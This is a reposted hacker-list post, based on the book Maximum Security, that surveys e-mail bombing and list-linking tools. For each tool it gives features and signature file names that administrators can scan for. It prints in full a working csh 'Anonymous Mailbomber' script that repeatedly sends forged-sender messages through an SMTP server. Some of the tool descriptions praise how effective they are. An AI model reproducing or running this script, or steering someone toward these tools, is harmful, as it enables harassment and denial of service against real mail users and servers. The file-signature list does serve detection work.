Destructive Devices Part 1 (This is an old post at my list 'arab- hackz', based on the book Maximum Security) ------------------------- Destructive devices are software programs or techniques that accomplish either of the following objectives: - Harassment - Destruction of data It should be noted that destructive devices could be a security risk for small networks or single servers. If your box is hooked up via Ethernet with a fast connection and you have only one mail server, an e-mail bomb attack on one of your users could temporarily grind your machine to a halt. I have chosen to highlight four key utilities within the destructive device class in four (4) parts: - E-mail bombs and list linking (Destructive Devices Part 1) - Flash bombs and war scripts (Destructive Devices Part 2) - Denial-of-service tools (Destructive Devices Part 3) - Viruses (Destructive Devices Part 4) The last two (denial-of-service tools and viruses) are of any real consequence. They have the potential for real damage or, equally dangerous, serious breach of a server's security. Up Yours: The Up Yours mail-bombing program is probably the most popular bomber out there. It uses minimal resources, does a superb job, has a simple user interface, and attempts to obscure the attacker's source address. Features of the program include being able to specify times of day to start and stop as well as the number of messages with which it will hammer the target. This bomber runs only on the Microsoft Windows platform. If you are a system administrator, you will want to scan your local drives for the following files: upyours.exe upyours2.zip upyours3.zip If these files appear in a user's directory, there is a strong likelihood that he is about to e-mail bomb someone (of course, perhaps he simply spends his time collecting hacking and cracking programs). In any event, the utility is hard to find. If one of your users has acquired this program, he clearly has an interest in hacking or cracking :o) KaBoom: KaBoom differs significantly from Up Yours. In the main program, you find a utility to list link. Using this function, you can subscribe your target to hundreds of e-mail lists. When I say that a target has been list-linked, I mean the target has been subscribed (without his consent) to one or more mailing lists. Such tools submit registration requests on behalf of the victim, forging his e-mail address. In any event, this utility's signature files are these: kaboom!3.zip kaboom3.exe Avalanche: The Avalanche e-mail bombing utility works smoothly and is well designed. The list groups are displayed in a drop-down combo box, and their individual lists are displayed in a list box. Three clicks of a mouse and your target is in hot water. TIP: The programmer here was a bit absentminded. The program was written at least in part in Microsoft Visual Basic 4.0. As such, there are a series of DLL files that are required to run the application. These are missing from the general distribution of this utility; therefore, serious bombers must go out onto the Internet to retrieve those files (one is OC2.DLL). Because of this, I would estimate that Avalanche is probably used less than its counterparts, even though its overall design is superior. Inconvenience discourages most users of this particular ilk. The signature files for this product are: alanch10.zip avalanche20.zip avalanche.exe Unabomber: The Unabomber utility is a rudimentary tool, but one must give the author credit for humor. Unabomber offers no list-linking capabilities. It is essentially a flat e-mail bomber and does no more than send messages over and over. One interesting element is that Unabomber comes with a help function. The signature files for this utility are: unabomb.zip unabomb.exe eXtreme Mail: eXtreme Mail is well programmed. It includes an interactive installation process that performs all the routine checks for disk space, resources, and so forth. It also observes proper registry conventions and is easily uninstalled. The signature files for this product are: xmailb1.zip xmailb1.exe Homicide: The Homicide utility was written by a youngster with the moniker Frys and was discontinued in 1996. The author claims that he wrote the utility because Up Yours 2.0 was inadequate as an e-mail bombing tool. However, with the release of Up Yours 3.0, Frys apparently decided to discontinue any further releases. As of March 1997, it is available only at a very few select sites. The signature files for this utility are: homicide.zip homicide.exe The UNIX MailBomb: This UNIX e-mail bomber is reportedly written by CyberGoat, an anonymous cracker out in the void. The signature file on this one is mailbomb.csh. #!/bin/csh # Anonymous Mailbomber # do chmod u+rwx where filename is the name of the file that # you saved it as. #*** WARNING - THIS WILL CREATE AND DELETE A TEMP FILE CALLED # "teltemp" # IN THE DIRECTORY IT IS RUN FROM **** clear echo -n "What is the name or address of the smtp server ?" set server = $< #echo open $server 25 > teltemp echo quote helo somewhere.com >> teltemp #The entry for the following should be a single name (goober), #not goober@i.... echo -n "Who will this be from (e.g. somebody) ?" set from = $< echo quote mail from: $from >> teltemp echo -n "Who is the lucky recipient (e.g. someone@somewhere) ? " set name = $< echo quote rcpt to: $name >> teltemp echo quote data >> teltemp echo quote . >> teltemp echo quote quit >> teltemp echo quit >> teltemp echo -n "How many times should it be sent ?" set amount = $< set loop_count = 1 while ($loop_count <= $amount) echo "Done $loop_count" ftp -n $server 25 < teltemp @ loop_count++ end rm ./teltemp echo $amount e-mails complete to $name from $from@$server # -------------------- # MailBomb by CyBerGoAT Bombtrack: The Bombtrack utility is reportedly the first mail-bombing tool written for the Macintosh platform. It is another run-of-the-mill bombing utility, widely available at hacker sites across the Internet. The signature file for this application is: bombtrack.bin FlameThrower: FlameThrower is a bombing utility written for Macintosh. Its main purpose is list linking; it allows the user to subscribe his target to 100 lists. The binary is quite large, considering its intended purpose. The signature for this file is: flamethrower10b.sit.bin Hat --=["Knowledge is Power"]=--